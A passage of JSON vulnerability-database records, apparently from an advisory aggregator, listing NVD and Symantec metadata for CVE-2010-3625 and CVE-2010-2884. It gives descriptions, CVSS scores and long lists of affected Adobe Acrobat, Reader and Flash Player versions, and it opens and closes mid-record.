"cpe:/a:adobe:acrobat_reader:9.1.3", "cpe:/a:adobe:acrobat:9.1", "cpe:/a:adobe:acrobat:9.3.2", "cpe:/a:adobe:acrobat:9.3", "cpe:/a:adobe:acrobat_reader:8.2", "cpe:/a:adobe:acrobat_reader:9.3.1", "cpe:/a:adobe:acrobat:9.1.1", "cpe:/a:adobe:acrobat:8.1.2", "cpe:/a:adobe:acrobat:9.3.3", "cpe:/a:adobe:acrobat_reader:9.3.2", "cpe:/a:adobe:acrobat:9.0", "cpe:/a:adobe:acrobat_reader:8.1.5", "cpe:/a:adobe:acrobat_reader:9.3", "cpe:/a:adobe:acrobat_reader:8.2.4", "cpe:/a:adobe:acrobat:9.2", "cpe:/a:adobe:acrobat:8.2.1", "cpe:/a:adobe:acrobat:9.1.2", "cpe:/a:adobe:acrobat:8.1", "cpe:/a:adobe:acrobat:8.2", "cpe:/a:adobe:acrobat_reader:9.3.3", "cpe:/a:adobe:acrobat:9.1.3", "cpe:/a:adobe:acrobat:8.1.4", "cpe:/a:adobe:acrobat:8.2.4", "cpe:/a:adobe:acrobat_reader:9.3.4", "cpe:/a:adobe:acrobat_reader:9.2", "cpe:/a:adobe:acrobat_reader:8.1.6", "cpe:/a:adobe:acrobat_reader:8.2.2", "cpe:/a:adobe:acrobat_reader:9.0", "cpe:/a:adobe:acrobat:8.1.5", "cpe:/a:adobe:acrobat:8.0", "cpe:/a:adobe:acrobat:8.2.2", "cpe:/a:adobe:acrobat:8.1.3", "cpe:/a:adobe:acrobat_reader:9.1.1", "cpe:/a:adobe:acrobat_reader:8.1.2", "cpe:/a:adobe:acrobat_reader:9.1", "cpe:/a:adobe:acrobat_reader:8.1.7", "cpe:/a:adobe:acrobat:8.1.1", "cpe:/a:adobe:acrobat_reader:8.2.3", "cpe:/a:adobe:acrobat_reader:9.1.2", "cpe:/a:adobe:acrobat:8.1.7", "cpe:/a:adobe:acrobat_reader:8.1.1", "cpe:/a:adobe:acrobat:8.2.3", "cpe:/a:adobe:acrobat_reader:8.0", "cpe:/a:adobe:acrobat:9.3.1", "cpe:/a:adobe:acrobat_reader:8.1.4", "cpe:/a:adobe:acrobat:9.3.4", "cpe:/a:adobe:acrobat_reader:8.2.1", "cpe:/a:adobe:acrobat_reader:8.1"], "id": "CVE-2010-3625", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-3625", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:adobe:acrobat:9.1:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:8.1.7:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:8.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:9.3:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:9.3.4:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:8.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:9.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:9.3.3:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:8.1:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:9.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:8.2:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:9.3:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:8.2:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:8.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:8.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:8.2.4:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:8.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:9.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:8.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:9.1:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:8.1.6:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:9.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:9.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:8.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:9.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:8.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:8.2.4:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:8.1.4:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:8.1:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:8.1.4:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:9.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:9.2:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:9.3.3:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:9.2:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:9.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:8.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:9.3.4:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:8.1.6:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:9.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:8.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:8.1.7:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:8.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:9.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:8.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:8.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:9.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:8.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:8.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:9.1.1:*:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T19:34:41", "description": "Adobe Flash Player 10.1.82.76 and earlier on Windows, Mac OS X, Linux, and Solaris and 10.1.92.10 on Android; authplay.dll in Adobe Reader and Acrobat 9.x before 9.4; and authplay.dll in Adobe Reader and Acrobat 8.x before 8.2.5 on Windows and Mac OS X allow remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, as exploited in the wild in September 2010.", "edition": 5, "cvss3": {}, "published": "2010-09-15T18:00:00", "title": "CVE-2010-2884", "type": "cve", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-2884"], "modified": "2018-10-30T16:26:00", "cpe": ["cpe:/a:adobe:flash_player:8.0.42.0", "cpe:/a:adobe:acrobat:8.1.6", "cpe:/a:adobe:acrobat:6.0.2", "cpe:/a:adobe:acrobat_reader:9.1.3", "cpe:/a:adobe:acrobat:9.1", "cpe:/a:adobe:acrobat:9.3.2", "cpe:/a:adobe:acrobat:7.0.2", "cpe:/a:adobe:acrobat_reader:5.0.11", "cpe:/a:adobe:acrobat_reader:5.0.6", "cpe:/a:adobe:flash_player:9.0.152.0", "cpe:/a:adobe:flash_player:10.0.42.34", "cpe:/a:adobe:acrobat:9.3", "cpe:/a:adobe:flash_player:8.0.24.0", "cpe:/a:adobe:flash_player:9.0.31", "cpe:/a:adobe:acrobat:7.1.4", "cpe:/a:adobe:acrobat_reader:8.2", "cpe:/a:adobe:acrobat_reader:9.3.1", "cpe:/a:adobe:acrobat:5.0.5", "cpe:/a:adobe:acrobat:7.0.1", "cpe:/a:adobe:acrobat:7.1.0", "cpe:/a:adobe:acrobat_reader:6.0.5", "cpe:/a:adobe:acrobat_reader:4.0.5c", "cpe:/a:adobe:acrobat_reader:5.0.5", "cpe:/a:adobe:acrobat_reader:7.0.3", "cpe:/a:adobe:flash_player:10.1.92.10", "cpe:/a:adobe:acrobat:9.1.1", "cpe:/a:adobe:acrobat:8.1.2", "cpe:/a:adobe:flash_player:9.0.31.0", "cpe:/a:adobe:acrobat:9.3.3", "cpe:/a:adobe:acrobat_reader:9.3.2", "cpe:/a:adobe:acrobat:4.0", "cpe:/a:adobe:acrobat_reader:6.0", "cpe:/a:adobe:acrobat:9.0", "cpe:/a:adobe:acrobat_reader:8.1.5", "cpe:/a:adobe:acrobat:7.0.6", "cpe:/a:adobe:acrobat_reader:5.0.10", "cpe:/a:adobe:acrobat:7.0.4", "cpe:/a:adobe:flash_player:7.0.1", "cpe:/a:adobe:acrobat:6.0.6", "cpe:/a:adobe:flash_player:8.0.39.0", "cpe:/a:adobe:acrobat_reader:7.0.7", "cpe:/a:adobe:acrobat_reader:5.0.9", "cpe:/a:adobe:acrobat_reader:9.3", "cpe:/a:adobe:flash_player:9.0.112.0", "cpe:/a:adobe:acrobat:6.0.1", "cpe:/a:adobe:acrobat:7.0.3", "cpe:/a:adobe:flash_player:9.0.20", "cpe:/a:adobe:flash_player:8.0.35.0", "cpe:/a:adobe:flash_player:9.0.18d60", "cpe:/a:adobe:acrobat:5.0.6", "cpe:/a:adobe:acrobat_reader:3.01", "cpe:/a:adobe:flash_player:7.0.70.0", "cpe:/a:adobe:acrobat:7.0.7", "cpe:/a:adobe:flash_player:7.1.1", "cpe:/a:adobe:flash_player:8.0.33.0", "cpe:/a:adobe:flash_player:9.0.16", "cpe:/a:adobe:acrobat:9.2", "cpe:/a:adobe:acrobat:8.2.1", "cpe:/a:adobe:flash_player:10.0.32.18", "cpe:/a:adobe:flash_player:7.1", "cpe:/a:adobe:flash_player:9.0.124.0", "cpe:/a:adobe:acrobat:9.1.2", "cpe:/a:adobe:acrobat:7.0.8", "cpe:/a:adobe:acrobat:8.1", "cpe:/a:adobe:acrobat:4.0.5", "cpe:/a:adobe:acrobat:8.2", "cpe:/a:adobe:acrobat_reader:9.3.3", "cpe:/a:adobe:acrobat:7.1.1", "cpe:/a:adobe:acrobat_reader:5.0.7", "cpe:/a:adobe:acrobat:9.1.3", "cpe:/a:adobe:acrobat:6.0.4", "cpe:/a:adobe:acrobat:8.1.4", "cpe:/a:adobe:flash_player:7.0.69.0", "cpe:/a:adobe:flash_player:10.0.22.87", "cpe:/a:adobe:acrobat_reader:9.3.4", "cpe:/a:adobe:acrobat_reader:4.0.5", "cpe:/a:adobe:acrobat_reader:5.0", "cpe:/a:adobe:acrobat_reader:9.2", "cpe:/a:adobe:acrobat:3.0", "cpe:/a:adobe:flash_player:10.1.82.76", "cpe:/a:adobe:acrobat_reader:4.0.5a", "cpe:/a:adobe:acrobat_reader:7.0.4", "cpe:/a:adobe:acrobat_reader:4.5", "cpe:/a:adobe:acrobat_reader:7.0.8", "cpe:/a:adobe:acrobat:7.1.2", "cpe:/a:adobe:flash_player:9.125.0", "cpe:/a:adobe:acrobat_reader:8.1.6", "cpe:/a:adobe:acrobat_reader:6.0.4", "cpe:/a:adobe:acrobat:7.0", "cpe:/a:adobe:acrobat:7.0.9", "cpe:/a:adobe:acrobat_reader:8.2.2", "cpe:/a:adobe:acrobat:6.0.5", "cpe:/a:adobe:acrobat_reader:9.0", "cpe:/a:adobe:flash_player:7.2", "cpe:/a:adobe:flash_player:10.0.12.36", "cpe:/a:adobe:flash_player:9.0.47.0", "cpe:/a:adobe:acrobat:8.1.5", "cpe:/a:adobe:flash_player:8.0.34.0", "cpe:/a:adobe:acrobat_reader:7.1.0", "cpe:/a:adobe:flash_player:9.0.151.0", "cpe:/a:adobe:flash_player:9.0.48.0", "cpe:/a:adobe:acrobat_reader:7.0.6", "cpe:/a:adobe:acrobat_reader:7.0.2", "cpe:/a:adobe:flash_player:9.0.115.0", "cpe:/a:adobe:acrobat:8.0", "cpe:/a:adobe:acrobat:8.2.2", "cpe:/a:adobe:acrobat:8.1.3", "cpe:/a:adobe:acrobat_reader:7.0.5", "cpe:/a:adobe:flash_player:9.0.28.0", "cpe:/a:adobe:acrobat:4.0.5a", "cpe:/a:adobe:acrobat_reader:9.1.1", "cpe:/a:adobe:flash_player:9.0.28", "cpe:/a:adobe:acrobat_reader:6.0.3", "cpe:/a:adobe:acrobat_reader:8.1.2", "cpe:/a:adobe:acrobat:6.0", "cpe:/a:adobe:flash_player:8.0.22.0", "cpe:/a:adobe:flash_player:8.0", "cpe:/a:adobe:flash_player:9.0.246.0", "cpe:/a:adobe:acrobat:7.0.5", "cpe:/a:adobe:flash_player:7.0.63", "cpe:/a:adobe:acrobat_reader:9.1", "cpe:/a:adobe:acrobat_reader:3.02", "cpe:/a:adobe:acrobat_reader:8.1.7", "cpe:/a:adobe:acrobat_reader:3.0", "cpe:/a:adobe:acrobat:8.1.1", "cpe:/a:adobe:acrobat_reader:6.0.2", "cpe:/a:adobe:acrobat_reader:8.2.3", "cpe:/a:adobe:acrobat_reader:6.0.1", "cpe:/a:adobe:acrobat_reader:9.1.2", "cpe:/a:adobe:acrobat:6.0.3", "cpe:/a:adobe:flash_player:10.0.15.3", "cpe:/a:adobe:flash_player:9.0.125.0", "cpe:/a:adobe:acrobat_reader:7.0.9", "cpe:/a:adobe:flash_player:9.0.20.0", "cpe:/a:adobe:flash_player:7.0.25", "cpe:/a:adobe:flash_player:9.0.114.0", "cpe:/a:adobe:acrobat:5.0.10", "cpe:/a:adobe:acrobat:8.1.7", "cpe:/a:adobe:acrobat_reader:8.1.1", "cpe:/a:adobe:acrobat:8.2.3", "cpe:/a:adobe:acrobat:4.0.5c", "cpe:/a:adobe:flash_player:10.0.0.584", "cpe:/a:adobe:acrobat_reader:8.0", "cpe:/a:adobe:acrobat:3.1", "cpe:/a:adobe:flash_player:10.0.12.10", "cpe:/a:adobe:flash_player:9.0.260.0", "cpe:/a:adobe:acrobat:7.1.3", "cpe:/a:adobe:acrobat_reader:5.1", "cpe:/a:adobe:acrobat_reader:4.0", "cpe:/a:adobe:flash_player:7.0", "cpe:/a:adobe:flash_player:9.0.45.0", "cpe:/a:adobe:acrobat:5.0", "cpe:/a:adobe:acrobat:9.3.1", "cpe:/a:adobe:acrobat_reader:8.1.4", "cpe:/a:adobe:acrobat:9.3.4", "cpe:/a:adobe:acrobat_reader:7.0", "cpe:/a:adobe:flash_player:9.0", "cpe:/a:adobe:acrobat_reader:8.2.1", "cpe:/a:adobe:acrobat_reader:8.1", "cpe:/a:adobe:acrobat_reader:7.0.1", "cpe:/a:adobe:flash_player:9.0.159.0"], "id": "CVE-2010-2884", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-2884", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:adobe:acrobat_reader:7.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:10.0.0.584:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:9.1:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:7.0.70.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:9.0.260.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:9.0.115.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:9.0.159.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:8.1.7:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:9.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:3.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:3.01:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:5.0.11:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:6.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:8.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:9.0.47.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:6.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:9.0.112.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:9.3:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:9.3.4:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:6.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:6.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:7.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:8.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:9.0.31:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:9.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:7.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:7.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:9.0.20:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:9.3.3:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:8.1:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:7.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:4.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:6.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:9.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:8.2:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:4.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:7.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:7.2:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:8.0.39.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:9.3:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:4.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:8.2:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:8.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:8.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:8.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:9.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:10.1.82.76:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:6.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:8.0.33.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:7.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:5.0.10:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:8.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:8.0.34.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:3.02:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:5.0.10:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:9.1:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:7.0.25:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:8.1.6:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:7.0.8:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:5.1:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:5.0.9:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:7.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:7.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:7.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:7.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:4.0.5a:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:5.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:3.1:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:9.0.151.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:7.0.69.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:7.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:9.125.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:9.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:9.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:7.1.4:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:8.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:10.0.12.10:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:10.0.15.3:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:8.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:5.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:9.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:8.0.22.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:7.0.9:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:10.0.42.34:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:7.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:4.0.5c:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:7.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:8.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:7.0.9:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:9.0.16:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:7.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:6.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:7.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:8.1.4:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:9.0.125.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:7.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:10.0.22.87:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:8.1:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:8.1.4:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:9.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:9.2:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:3.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:7.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:6.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:9.3.3:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:9.0.18d60:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:9.0.124.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:9.0.28.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:9.2:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:9.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:9.0.114.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:10.1.92.10:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:8.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:6.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:8.0.24.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:7.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:5.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:7.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:5.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:9.0.246.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:6.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:6.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:9.0.28:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:9.3.4:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:6.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:7.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:7.0.8:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:5.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:8.1.6:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:9.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:6.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:10.0.32.18:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:4.0.5a:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:10.0.12.36:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:8.0.35.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:8.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:4.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:7.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:8.1.7:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:8.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:9.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:7.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:7.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:9.0.152.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:9.0.20.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:8.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:5.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:7.0.63:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:8.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:7.1:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:9.0.48.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:9.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:4.0.5c:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:8.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:8.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:9.0.45.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:9.0.31.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:5.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:4.5:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:9.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:8.0.42.0:*:*:*:*:*:*:*"]}], "symantec": [{"lastseen": "2018-03-13T06:16:50", "bulletinFamily": "software", "cvelist": ["CVE-2010-2884"], "description": "### Description\n\nAdobe Flash Player is prone to an unspecified remote code-execution vulnerability. Successful exploits will allow an attacker to run arbitrary code in the context of the user running the application. Failed attacks may cause denial-of-service conditions. Adobe Flash Player 10.1.82.76 and prior are vulnerable.\n\n### Technologies Affected\n\n * Adobe AIR 1.5 \n * Adobe AIR 1.5.1 \n * Adobe AIR 1.5.2 \n * Adobe AIR 1.5.3 \n * Adobe AIR 1.5.3.9120 \n * Adobe AIR 1.5.3.9130 \n * Adobe AIR 2.0.2.12610 \n * Adobe AIR 2.0.3 \n * Adobe Acrobat 7.0.0 \n * Adobe Acrobat 7.0.1 \n * Adobe Acrobat 7.0.2 \n * Adobe Acrobat 7.0.3 \n * Adobe Acrobat 7.0.9 \n * Adobe Acrobat 7.1.2 \n * Adobe Acrobat 8.1.5 \n * Adobe Acrobat 8.2.2 \n * Adobe Acrobat 8.2.3 \n * Adobe Acrobat 8.2.4 \n * Adobe 